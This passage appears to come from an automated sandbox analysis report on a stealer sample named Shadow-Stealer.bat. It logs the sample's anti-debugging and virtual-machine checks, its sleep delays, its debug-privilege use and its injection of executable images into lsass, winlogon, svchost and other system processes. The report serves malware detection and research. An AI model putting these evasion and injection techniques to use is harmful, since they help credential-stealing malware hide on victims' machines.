            Source: C:\Windows\System32\svchost.exeAPI coverage: 6.9 %
            Source: C:\Windows\SysWOW64\cscript.exeAPI coverage: 5.2 %
            Source: C:\Windows\$sxr-mshta.exeMemory allocated: 1ACE86E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\$sxr-mshta.exeMemory allocated: 1ACE8930000 memory commit | memory reserve | memory write watchJump to behavior
            Source: C:\Windows\$sxr-mshta.exeMemory allocated: 1ACE8AD0000 memory commit | memory reserve | memory write watchJump to behavior
            Source: C:\Windows\$sxr-mshta.exeMemory allocated: 1ACE8B10000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
            Source: C:\Windows\System32\dwm.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
            Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
            Source: C:\Windows\System32\winlogon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_22-50681
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\dllhost.exeAPI call chain: ExitProcess graph end node
            Source: C:\Windows\$sxr-mshta.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\$sxr-mshta.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
            Source: C:\Windows\$sxr-mshta.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\$sxr-mshta.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
            Source: C:\Windows\$sxr-mshta.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\$sxr-mshta.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
            Source: dwm.exe, 0000001A.00000000.2491407917.000001D156AA0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000gB
            Source: lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
            Source: dllhost.exe, 00000008.00000002.2310298135.0000015FDDFE1000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000008.00000002.2310433319.0000015FDE220000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000009.00000002.2310743730.0000000003650000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000009.00000002.2310637736.000000000327E000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000009.00000003.2309620306.000000000327C000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2362429913.0000021EA07F1000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2362615637.0000021EA0AB0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000C.00000002.2363058947.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000C.00000002.2363307282.00000000031E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000C.00000003.2361922894.0000000002CDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hgfsrSDsof=dVx
            Source: Shadow-Stealer.batBinary or memory string: %twJz:uwJzjJyaUpcyiwGBaxyLIfqozaqDUqkKRqaiFgVVIunfLkwIqCzoZaandvairVgBfqFQwyWUBCcnQmDoDJmqQWKRpLdkgMCNnLauFDmRHGNxYMxQPKDIHNJjHMBJvKMOana=%"tnfLkvIrCz%jJya%"hgfsr"
            Source: svchost.exe, 00000026.00000002.3362805756.00000200A122B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
            Source: svchost.exe, 00000023.00000000.2515680028.000001A1CA000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
            Source: lsass.exe, 00000018.00000002.3361810056.000002D6F064E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pL;VMWare
            Source: lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
            Source: $sxr-mshta.exe, 0000000A.00000002.3379935784.000001ACE8C8B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}%
            Source: dwm.exe, 0000001A.00000002.3398038985.000001D156B0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: lsass.exe, 00000018.00000000.2485608595.000002D6F0613000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3361004221.000002D6F0613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2488659934.0000014E41C13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3360601576.0000014E41C13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.2512834332.0000023C9FE2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.3388959733.0000023C9FE2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.2515792701.000001A1CA034000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3361889502.000001A1CA02A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.3363095469.00000200A1241000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.2527765521.00000200A1241000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: svchost.exe, 00000019.00000002.3360601576.0000014E41C13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACEA2DBEDC FindFirstFileExW,10_2_000001ACEA2DBEDC
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_000002155A5BBEDC FindFirstFileExW,13_2_000002155A5BBEDC
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137F823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,13_2_00007FF7137F823C
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137F2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,13_2_00007FF7137F2978
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF713807B4C FindFirstFileW,FindNextFileW,FindClose,13_2_00007FF713807B4C
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,13_2_00007FF7137E35B8
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,13_2_00007FF7137E1560
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_000001F5FDC7BEDC FindFirstFileExW,19_2_000001F5FDC7BEDC
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0165EBEDC FindFirstFileExW,22_2_000002D0165EBEDC
            Source: C:\Windows\System32\lsass.exeCode function: 24_2_000002D6F151BEDC FindFirstFileExW,24_2_000002D6F151BEDC
            Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000014E41FDBEDC FindFirstFileExW,25_2_0000014E41FDBEDC
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15B49BEDC FindFirstFileExW,26_2_000001D15B49BEDC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_009F9AE0 FindFirstFileExW,28_2_009F9AE0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00A19AE0 FindFirstFileExW,28_2_00A19AE0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B19AE0 FindFirstFileExW,28_2_00B19AE0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B39AE0 FindFirstFileExW,28_2_00B39AE0
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_00007FF64E1D1008 GetVersion,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,RegOpenKeyExA,RegQueryValueExA,ExpandEnvironmentStringsA,LoadLibraryA,RegCloseKey,GetModuleHandleW,GetProcAddress,MultiByteToWideChar,UnregisterApplicationRestart,GetProcAddress,FreeLibrary,RegCloseKey,10_2_00007FF64E1D1008
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_009D0CE3 mov eax, dword ptr fs:[00000030h]28_2_009D0CE3
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_009D75D8 mov eax, dword ptr fs:[00000030h]28_2_009D75D8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_009D87F7 mov eax, dword ptr fs:[00000030h]28_2_009D87F7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_009F18E3 mov eax, dword ptr fs:[00000030h]28_2_009F18E3
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_009F81D8 mov eax, dword ptr fs:[00000030h]28_2_009F81D8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_009F93F7 mov eax, dword ptr fs:[00000030h]28_2_009F93F7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00A118E3 mov eax, dword ptr fs:[00000030h]28_2_00A118E3
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00A181D8 mov eax, dword ptr fs:[00000030h]28_2_00A181D8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00A193F7 mov eax, dword ptr fs:[00000030h]28_2_00A193F7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00A30CE3 mov eax, dword ptr fs:[00000030h]28_2_00A30CE3
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00A375D8 mov eax, dword ptr fs:[00000030h]28_2_00A375D8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00A387F7 mov eax, dword ptr fs:[00000030h]28_2_00A387F7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00AF0CE3 mov eax, dword ptr fs:[00000030h]28_2_00AF0CE3
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00AF75D8 mov eax, dword ptr fs:[00000030h]28_2_00AF75D8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00AF87F7 mov eax, dword ptr fs:[00000030h]28_2_00AF87F7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B118E3 mov eax, dword ptr fs:[00000030h]28_2_00B118E3
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B181D8 mov eax, dword ptr fs:[00000030h]28_2_00B181D8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B193F7 mov eax, dword ptr fs:[00000030h]28_2_00B193F7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B318E3 mov eax, dword ptr fs:[00000030h]28_2_00B318E3
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B381D8 mov eax, dword ptr fs:[00000030h]28_2_00B381D8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B393F7 mov eax, dword ptr fs:[00000030h]28_2_00B393F7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_02DC87F7 mov eax, dword ptr fs:[00000030h]28_2_02DC87F7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_02DC0CE3 mov eax, dword ptr fs:[00000030h]28_2_02DC0CE3
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_02DC75D8 mov eax, dword ptr fs:[00000030h]28_2_02DC75D8
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACEA2D7F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_000001ACEA2D7F10
            Source: C:\Windows\System32\dllhost.exeCode function: 8_2_0000000140001368 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,K32EnumProcesses,OpenProcess,K32EnumProcessModules,ReadProcessMemory,CloseHandle,FindCloseChangeNotification,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,8_2_0000000140001368
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\dllhost.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\dllhost.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\dllhost.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\dllhost.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\dllhost.exeProcess token adjusted: Debug
            Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\dllhost.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\dllhost.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\dllhost.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\dllhost.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACEA2D7F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_000001ACEA2D7F10
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACEA2DB5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_000001ACEA2DB5AC
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACEA2E3228 SetUnhandledExceptionFilter,10_2_000001ACEA2E3228
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_00007FF64E1D1800 SetUnhandledExceptionFilter,10_2_00007FF64E1D1800
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_00007FF64E1D1ADC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FF64E1D1ADC
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_000002155A5BB5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_000002155A5BB5AC
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_000002155A5C3228 SetUnhandledExceptionFilter,13_2_000002155A5C3228
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_000002155A5B7F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_000002155A5B7F10
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137F8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FF7137F8FA4
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137F93B0 SetUnhandledExceptionFilter,13_2_00007FF7137F93B0
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_000001F5FDC77F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000001F5FDC77F10
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_000001F5FDC83228 SetUnhandledExceptionFilter,19_2_000001F5FDC83228
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_000001F5FDC7B5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000001F5FDC7B5AC
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0165E7F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000002D0165E7F10
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0165EB5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000002D0165EB5AC
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0165F3228 SetUnhandledExceptionFilter,22_2_000002D0165F3228
            Source: C:\Windows\System32\lsass.exeCode function: 24_2_000002D6F151B5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_000002D6F151B5AC
            Source: C:\Windows\System32\lsass.exeCode function: 24_2_000002D6F1523228 SetUnhandledExceptionFilter,24_2_000002D6F1523228
            Source: C:\Windows\System32\lsass.exeCode function: 24_2_000002D6F1517F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_000002D6F1517F10
            Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000014E41FD7F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_0000014E41FD7F10
            Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000014E41FE3228 SetUnhandledExceptionFilter,25_2_0000014E41FE3228
            Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000014E41FDB5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_0000014E41FDB5AC
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15B497F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000001D15B497F10
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15B4A3228 SetUnhandledExceptionFilter,26_2_000001D15B4A3228
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15B49B5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000001D15B49B5AC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_009F9428 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_009F9428
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_009F6964 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_009F6964
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_009F667A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_009F667A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00A19428 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00A19428
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00A16964 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00A16964
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00A1667A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00A1667A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B19428 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00B19428
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B16964 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00B16964
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B1667A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00B1667A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B39428 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00B39428
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B36964 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00B36964
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B3667A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00B3667A

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\$sxr-powershell.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016580000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E41FA0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15B4C0000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Windows\SysWOW64\cscript.exe base: 2DC0000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: D30000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016610000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F1540000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E428D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15B460000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF32B0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23C9FD60000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016670000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F15A0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E42930000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15CAD0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF3310000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23C9FDC0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA710000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 246ED7B0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D0166D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F1600000 value starts with: 4D5A
